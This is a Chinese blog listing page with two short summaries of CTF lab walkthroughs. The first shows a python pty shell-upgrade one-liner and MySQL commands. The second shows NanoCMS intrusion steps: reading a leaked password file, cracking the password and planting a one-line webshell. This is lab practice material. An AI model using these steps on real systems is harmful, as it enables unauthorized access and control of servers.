2024年9月12日
靶机 ctf7-老版ssh解决
摘要: 可交互shell python2 -c 'import pty;pty.spawn("/bin/bash")' mysql命令 mysql -u -p show database; use xxxx 退出 exit /q awk cat sql |awk -F ' ' '{print $2}' 密码 阅读全文
posted @ 2024-09-12 21:46 eth258 阅读(6) 评论(0) 推荐(0) 编辑
靶机 ctf5-perl递归查询
摘要: 暴露了很多端口 80端口发现是nanocms、 查询exploit http://192.168.200.144/~andy/data/pagesdata.txt 会暴露密码 searchsploit nanocms 那个根本利用不了的 破解密码得出shannon 进入cms添加一句话马,执行 <? 阅读全文
posted @ 2024-09-12 21:45 eth258 阅读(11) 评论(0) 推荐(0) 编辑